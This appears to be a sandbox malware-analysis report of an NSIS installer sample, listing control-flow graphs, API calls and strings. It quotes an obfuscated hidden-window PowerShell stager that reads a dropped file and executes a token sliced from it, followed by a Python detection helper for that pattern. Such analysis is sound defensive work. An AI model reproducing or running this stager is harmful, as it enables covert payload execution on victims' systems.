control_flow_graph 566 402e9f-402eb3 567 402eb5 566->567 568 402ebc-402ec5 566->568 567->568 569 402ec7 568->569 570 402ece-402ed3 568->570 569->570 571 402ee3-402ef0 call 4030b1 570->571 572 402ed5-402ede call 4030c7 570->572 576 402ef6-402efa 571->576 577 40309f 571->577 572->571 578 402f00-402f49 GetTickCount 576->578 579 40304a-40304c 576->579 580 4030a1-4030a2 577->580 581 4030a7 578->581 582 402f4f-402f57 578->582 584 40308c-40308f 579->584 585 40304e-403051 579->585 583 4030aa-4030ae 580->583 581->583 586 402f59 582->586 587 402f5c-402f6a call 4030b1 582->587 588 403091 584->588 589 403094-40309d call 4030b1 584->589 585->581 590 403053 585->590 586->587 587->577 599 402f70-402f79 587->599 588->589 589->577 600 4030a4 589->600 593 403056-40305c 590->593 594 403060-40306e call 4030b1 593->594 595 40305e 593->595 594->577 603 403070-40307c call 405a49 594->603 595->594 602 402f7f-402f9f call 4061ab 599->602 600->581 608 403042-403044 602->608 609 402fa5-402fb8 GetTickCount 602->609 610 403046-403048 603->610 611 40307e-403088 603->611 608->580 612 402fba-402fc2 609->612 613 402ffd-402fff 609->613 610->580 611->593 616 40308a 611->616 617 402fc4-402fc8 612->617 618 402fca-402ff5 MulDiv wsprintfA call 404f48 612->618 614 403001-403005 613->614 615 403036-40303a 613->615 619 403007-40300e call 405a49 614->619 620 40301c-403027 614->620 615->582 621 403040 615->621 616->581 617->613 617->618 625 402ffa 618->625 626 403013-403015 619->626 624 40302a-40302e 620->624 621->581 624->602 627 403034 624->627 625->613 626->610 628 403017-40301a 626->628 627->581 628->624
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: DA$ DA$... %d%%
• API String ID: 551687249-812340929
• Opcode ID: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
• Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
• Opcode Fuzzy Hash: 2b72737498d8f4829c31d655f0fb16f39a0d94af35b4a6af303c262a191fd477
• Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

Control-flow Graph
control_flow_graph 629 40605a-40607a GetSystemDirectoryA 630 40607c 629->630 631 40607e-406080 629->631 630->631 632 406090-406092 631->632 633 406082-40608a 631->633 635 406093-4060c5 wsprintfA LoadLibraryExA 632->635 633->632 634 40608c-40608e 633->634 634->635
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
• wsprintfA.USER32 ref: 004060AA
• LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%s.dll$UXTHEME$\
• API String ID: 2200240437-4240819195
• Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
• Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
• Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
• Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                                                                                                                                          Control-flow Graph (rendered as an image on the original page; the executed/not-executed colouring is not recoverable here): function entry 401f90, blocks through 4028de; API blocks GetModuleHandleA (401fba-401fc5), LoadLibraryExA (401fc7-401fd5), GetProcAddress (401fd7-401fe4), FreeLibrary (402044-40204b); internal calls to 402a3a, 401423, 404f48, 40364f.
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                                            • Part of subcall function 00404F48: lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
                                                                                                                                                                                                            • Part of subcall function 00404F48: SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                                            • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 0040200F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                          • String ID: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 2987980305-1576824727
                                                                                                                                                                                                          • Opcode ID: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                                                                                                                                                          • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
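
The command line in the string references of this function is the PowerShell stager the NSIS installer launches: it reads the dropped file with Get-Content -raw, slices a three-character token out of it with SubString(72097,3), and invokes that token through the call operator with the whole file content as the argument, so the real command name never appears on the command line. The triage helper below is an added example and not part of the Joe Sandbox report or of the sample. It parses the three pieces out of a process-creation command line, refuses to match unless they chain together (slice taken from the variable holding the file, invoked variable equal to the slice, argument equal to the file variable), and shows what the token would resolve to. The report does not show the contents of Martyrization.Pra121, so the file built here is constructed and the `iex` planted at offset 72097 is an assumption; all function and variable names are the example's own.

```python
"""Triage helper for the Get-Content/SubString/call-operator PowerShell stager.

Added example, not part of the sandbox report. The sample file content is
constructed; the report does not reveal the 3 bytes at offset 72097, so the
'iex' value used below is an assumption.
"""
import re
from typing import NamedTuple, Optional

# The command line exactly as it appears in the report's string references.
REPORT_CMDLINE = (
    "powershell.exe -windowstyle hidden \"$Polysaccum=Get-Content -raw "
    "'C:\\Users\\user\\AppData\\Local\\Temp\\Badefaciliteter140\\Head158"
    "\\rekvireringen\\Martyrization.Pra121';"
    "$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);"
    ".$Sikkerhedsforvaringernes($Polysaccum)"
)


class StagerPattern(NamedTuple):
    content_var: str   # variable that receives the file content
    path: str          # file read by Get-Content -raw
    token_var: str     # variable that receives the sliced command name
    offset: int        # SubString start
    length: int        # SubString length


# $var = Get-Content -raw '<path>'
_GET_CONTENT = re.compile(
    r"\$(?P<cvar>\w+)\s*=\s*Get-Content\s+-raw\s+'(?P<path>[^']+)'", re.I)
# $tok = $var.SubString(<offset>,<length>)
_SUBSTRING = re.compile(
    r"\$(?P<tvar>\w+)\s*=\s*\$(?P<src>\w+)\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)",
    re.I)
# .$tok($var)  or  &$tok($var): call operator on a variable-held command name
_INVOKE = re.compile(r"[.&]\s*\$(?P<tvar>\w+)\s*\(\s*\$(?P<arg>\w+)\s*\)")


def parse_stager(cmdline: str) -> Optional[StagerPattern]:
    """Return the stager's parts if all three pieces chain together, else None."""
    gc = _GET_CONTENT.search(cmdline)
    ss = _SUBSTRING.search(cmdline)
    iv = _INVOKE.search(cmdline)
    if not (gc and ss and iv):
        return None
    # Require the data flow the sample shows: slice taken from the file
    # variable, the slice invoked as a command, the file passed as argument.
    if ss["src"] != gc["cvar"] or iv["tvar"] != ss["tvar"] or iv["arg"] != gc["cvar"]:
        return None
    return StagerPattern(gc["cvar"], gc["path"], ss["tvar"],
                         int(ss["off"]), int(ss["len"]))


def resolve_token(content: str, pat: StagerPattern) -> str:
    """The command name PowerShell would execute: SubString(offset, length) of the file."""
    return content[pat.offset:pat.offset + pat.length]


def build_sample_file(token: str, offset: int, size: int) -> str:
    """Constructed stand-in for the dropped file: filler with the token planted at offset."""
    filler = "#" * size
    return filler[:offset] + token + filler[offset + len(token):]


def is_suspicious(cmdline: str) -> bool:
    """Detection rule: file read, substring slice and variable call operator chained in one command line."""
    return parse_stager(cmdline) is not None


if __name__ == "__main__":
    pat = parse_stager(REPORT_CMDLINE)
    print(pat)
    # Assumption: the 3 bytes at 72097 spell an alias such as 'iex'.
    sample = build_sample_file("iex", 72097, 80000)
    print("invoked token:", resolve_token(sample, pat))
```

The chaining check matters for false-positive control: Get-Content, SubString and a call operator each occur in legitimate administration scripts, but a command name sliced out of the data it is then applied to is the stager's signature. Once the triage extracts the path and offset, the next step is to pull that file from the host and read the token from the real content rather than assuming it.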

                                                                                                                                                                                                          Control-flow Graph (rendered as an image on the original page; the executed/not-executed colouring is not recoverable here): function entry 4059d1, blocks through 405a18; GetTickCount and GetTempFileNameA in block 4059dc-405a07; no internal calls.
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                                                                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                                                                                                                          • "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 004059D1
                                                                                                                                                                                                          • nsa, xrefs: 004059DC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                          • API String ID: 1716503409-1120060315
                                                                                                                                                                                                          • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                                          • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                                                                                                                                          Control-flow Graph (rendered as an image on the original page; the executed/not-executed colouring is not recoverable here): function entry 40588f, blocks through 405904; API blocks lstrlenA (4058e1-4058ea), GetFileAttributesA (4058ec-405900); internal calls to 405d2f, 40583a, 405f9a, 406033, 4057e8, 4057a1.
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Snik Setup,NSIS Error), ref: 00405D3C
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                          • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 3248276644-2214159804
                                                                                                                                                                                                          • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                                                                                                          • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E

                                                                                                                                                                                                          Control-flow Graph (rendered as an image on the original page; the executed/not-executed colouring is not recoverable here): function entry 4015b3, blocks through 4028de; API blocks GetFileAttributesA (401604-40160d), SetCurrentDirectoryA (401621-40163c); internal calls to 402a3a, 40583a, 4057cc, 40548b, 401423, 405d2f, 4054a8, 40540e.
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                                                            • Part of subcall function 0040540E: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 00401629
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen
                                                                                                                                                                                                          • API String ID: 1892508949-468232566
                                                                                                                                                                                                          • Opcode ID: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                                                                                                                                                                          • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c48e80625146c734819094399e099f0f26d2d720ad305fd1441f6452ebd5e2f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F

Control-flow Graph (executed / not executed blocks; graph rendering omitted): basic blocks 4054c0 through 405500, calling CreateProcessA and CloseHandle
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
• CloseHandle.KERNEL32(?), ref: 004054F6
Strings
• Error launching installer, xrefs: 004054D3
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
• Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
• Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
• Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
APIs
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
  • Part of subcall function 00404F48: lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
  • Part of subcall function 00404F48: SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
  • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
  • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
• String ID:
• API String ID: 3521207402-0
• Opcode ID: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
• Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
• Opcode Fuzzy Hash: d8b5dce07ba6ac1784379787cb29f6b1de53264d6e7b4441dd29526f16ac5c4c
• Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
APIs
  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
• RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
• RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
• Opcode ID: 2e1c7d330be965f569518e561c755f509e7644e2f76c499267a2e8e8767b0554
• Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
• Opcode Fuzzy Hash: 2e1c7d330be965f569518e561c755f509e7644e2f76c499267a2e8e8767b0554
• Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
APIs
  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
• RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
• RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
